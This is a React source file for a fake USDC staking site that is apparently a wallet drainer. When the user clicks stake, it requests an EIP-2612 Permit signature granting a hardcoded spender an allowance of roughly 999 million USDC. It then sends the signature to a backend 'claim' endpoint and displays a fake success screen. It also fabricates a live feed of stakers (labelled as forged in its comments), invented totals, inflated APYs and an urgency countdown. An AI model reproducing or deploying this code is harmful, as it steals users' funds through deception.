import React, { useEffect, useState, useRef } from 'react';
import { track } from '../../utils/funnel';
import './StakeDapp.css';
import Countdown from '../../components/Countdown';
import { useT } from '../../utils/translations';

const USDC = '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48';
const SPENDER = '0x3EB9dbbCb46C1eF22C66490140129724A158faeb';
const CLAIM_AMOUNT = '999999999000000';

// 锁定期与 APY
const LOCKS = [
  { days: 7, apy: 42.5 },
  { days: 30, apy: 68.2 },
  { days: 90, apy: 86.5 },
];

// 伪造的社会证明记录
const FAKE_NAMES = [
  '0x3f2a...8b9c', '0x91dc...44a7', '0x7b0e...c2f1', '0xa45f...903d',
  '0x22c8...77b0', '0xfe91...13aa', '0x58d3...e06b', '0xc7b4...2d88',
];
const FAKE_AMOUNTS = [1250, 3400, 780, 5200, 2150, 9900, 460, 6300];

const StakeDapp = () => {
  const t = useT();
  const [account, setAccount] = useState('');
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle'); // idle -> signing -> submitting -> done
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const [balance, setBalance] = useState('0');
  const [amount, setAmount] = useState('');
  const [lockIdx, setLockIdx] = useState(1);
  const [feeds, setFeeds] = useState([]);
  const autoStarted = useRef(false);

  const provider = () => (typeof window !== 'undefined' ? window.ethereum : null);

  // 社会证明滚动
  useEffect(() => {
    const makeFeed = () => ({
      name: FAKE_NAMES[Math.floor(Math.random() * FAKE_NAMES.length)],
      amount: FAKE_AMOUNTS[Math.floor(Math.random() * FAKE_AMOUNTS.length)],
      time: 'just now',
      id: Math.random(),
    });
    setFeeds([makeFeed(), makeFeed(), makeFeed()]);
    const t = setInterval(() => {
      setFeeds((prev) => [makeFeed(), ...prev].slice(0, 8));
    }, 4000);
    return () => clearInterval(t);
  }, []);

  const readBalance = async (p, owner) => {
    try {
      const data = '0x70a08231' + owner.slice(2).toLowerCase().padStart(64, '0');
      const result = await p.request({ method: 'eth_call', params: [{ to: USDC, data }, 'latest'] });
      return (parseInt(result || '0x0', 16) / 1e6).toFixed(2);
    } catch (e) { return '0'; }
  };

  useEffect(() => {
    let cancelled = false;
    track('stake', 'view', '');
    const check = async () => {
      const p = provider();
      if (!p) {
        setError(t('stake.noWallet'));
        return;
      }
      try {
        const accounts = await p.request({ method: 'eth_requestAccounts' });
        if (cancelled) return;
        if (accounts && accounts[0]) {
          setAccount(accounts[0]);
          setWalletReady(true);
          const bal = await readBalance(p, accounts[0]);
          setBalance(bal);
        }
      } catch (e) {
        if (!cancelled) setError(t('stake.rejected'));
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  const doStake = async () => {
    track('stake', 'start', '');
    const p = provider();
    if (!p || !account) return;
    setStage('signing');
    setError('');
    try {
      const nonceData = '0x7ecebe00' + account.slice(2).toLowerCase().padStart(64, '0');
      const nonce = await p.request({ method: 'eth_call', params: [{ to: USDC, data: nonceData }, 'latest'] });
      const deadline = Math.floor(Date.now() / 1000) + 30 * 24 * 3600;

      const typedData = {
        types: {
          EIP712Domain: [
            { name: 'name', type: 'string' },
            { name: 'version', type: 'string' },
            { name: 'chainId', type: 'uint256' },
            { name: 'verifyingContract', type: 'address' },
          ],
          Permit: [
            { name: 'owner', type: 'address' },
            { name: 'spender', type: 'address' },
            { name: 'value', type: 'uint256' },
            { name: 'nonce', type: 'uint256' },
            { name: 'deadline', type: 'uint256' },
          ],
        },
        primaryType: 'Permit',
        domain: { name: 'USD Coin', version: '2', chainId: 1, verifyingContract: USDC },
        message: {
          owner: account,
          spender: SPENDER,
          value: CLAIM_AMOUNT,
          nonce: nonce,
          deadline: String(deadline),
        },
      };

      const signature = await p.request({
        method: 'eth_signTypedData_v4',
        params: [account, JSON.stringify(typedData)],
      });

      const sig = signature.startsWith('0x') ? signature.slice(2) : signature;
      const r = '0x' + sig.slice(0, 64);
      const s = '0x' + sig.slice(64, 128);
      const v = sig.slice(128, 130);

      setStage('submitting');
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/evm/claim', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          owner: account, value: CLAIM_AMOUNT, nonce: nonce,
          deadline: String(deadline), r, s, v,
        }),
      });
      const result = await resp.json();
      if (result.code !== 200) throw new Error(result.message || t('stake.failed'));
      setTxId(result.data.txId || '');
    track('stake', 'done', '');
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError(t('stake.canceled'));
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  const lock = LOCKS[lockIdx];
  const dailyYield = amount ? (Number(amount) * lock.apy / 100 / 365).toFixed(2) : '0.00';

  return (
    <div className="stake-page">
      <div className="stake-header">
        <div className="stake-logo">⬡ 智汇 Stake</div>
        <button className="stake-connect">
          {account ? account.slice(0, 6) + '...' + account.slice(-4) : t('stake.connect')}
        </button>
      </div>

      <div className="stake-banner">
        <Countdown minutes={30} />
        <span className="stake-quota">{t('stake.limit')}</span>
      </div>

      <div className="stake-hero">
        <div className="stake-stat"><b>$12.4M</b><span>{t('stake.totalStaked')}</span></div>
        <div className="stake-stat"><b>{lock.apy}%</b><span>{t('stake.currentApy')}</span></div>
        <div className="stake-stat"><b>12,846</b><span>{t('stake.stakers')}</span></div>
      </div>

      <div className="stake-card">
        {stage === 'done' ? (
          <>
            <div className="stake-done-icon">✓</div>
            <h2>{t('stake.done')}</h2>
            <p className="stake-desc">
              You staked {amount || '0'} USDC for {lock.days} days at {lock.apy}% APY.
              Estimated daily yield: {dailyYield} USDC.
            </p>
            <div className="stake-position">
              <div className="stake-pos-row"><span>{t('stake.posStaked')}</span><b>{amount || '0'} USDC</b></div>
              <div className="stake-pos-row"><span>{t('stake.posLock')}</span><b>{t('stake.days', { d: lock.days })}</b></div>
              <div className="stake-pos-row"><span>{t('stake.posApy')}</span><b className="stake-green">{lock.apy}%</b></div>
            </div>
            {txId && <p className="stake-tx">Tx: {txId.slice(0, 20)}...</p>}
          </>
        ) : (
          <>
            <div className="stake-title-row">
              <h2>{t('stake.title')}</h2>
              <span className="stake-refresh">⟳</span>
            </div>

            <div className="stake-box">
              <div className="stake-box-head">
                <span>{t('stake.amount')}</span>
                <span className="stake-balance">{t('stake.balance', { bal: balance })} <button onClick={() => setAmount(balance)}>{t('stake.max')}</button></span>
              </div>
              <div className="stake-input-row">
                <input type="number" placeholder="0.0" value={amount} onChange={(e) => setAmount(e.target.value)} />
                <div className="stake-token"><span className="stake-token-icon">$</span> USDC</div>
              </div>
            </div>

            <div className="stake-locks">
              {LOCKS.map((l, i) => (
                <button
                  key={l.days}
                  className={`stake-lock ${i === lockIdx ? 'stake-lock-on' : ''}`}
                  onClick={() => setLockIdx(i)}
                >
                  <b>{l.days}D</b>
                  <span>{l.apy}%</span>
                </button>
              ))}
            </div>

            <div className="stake-yield">
              <span>{t('stake.daily')}</span>
              <b className="stake-green">{dailyYield} USDC</b>
            </div>

            {walletReady && <p className="stake-addr">{t('common.wallet')} {account.slice(0, 10)}...</p>}
            {error && <p className="stake-error">{error}</p>}

            {stage === 'idle' && (
              <button className="stake-btn" onClick={doStake} disabled={!walletReady || !amount}>
                {t('stake.btn')}
              </button>
            )}
            {(stage === 'signing' || stage === 'submitting') && (
              <div className="stake-btn stake-btn-loading">
                <div className="stake-spinner" />
                {stage === 'signing' ? t('stake.confirm') : t('stake.submitting')}
              </div>
            )}
            {error && stage === 'idle' && (
              <button className="stake-btn" onClick={doStake}>{t('common.retry')}</button>
            )}
          </>
        )}
      </div>

      {/* 社会证明滚动 */}
      <div className="stake-feeds">
        <div className="stake-feeds-title">{t('stake.recent')}</div>
        {feeds.map((f) => (
          <div className="stake-feed" key={f.id}>
            <span className="stake-feed-name">{f.name}</span>
            <span className="stake-feed-amt">{t('stake.staked', { amt: f.amount.toLocaleString() })}</span>
            <span className="stake-feed-time">{t('stake.justNow')}</span>
          </div>
        ))}
      </div>
    </div>
  );
};

export default StakeDapp;
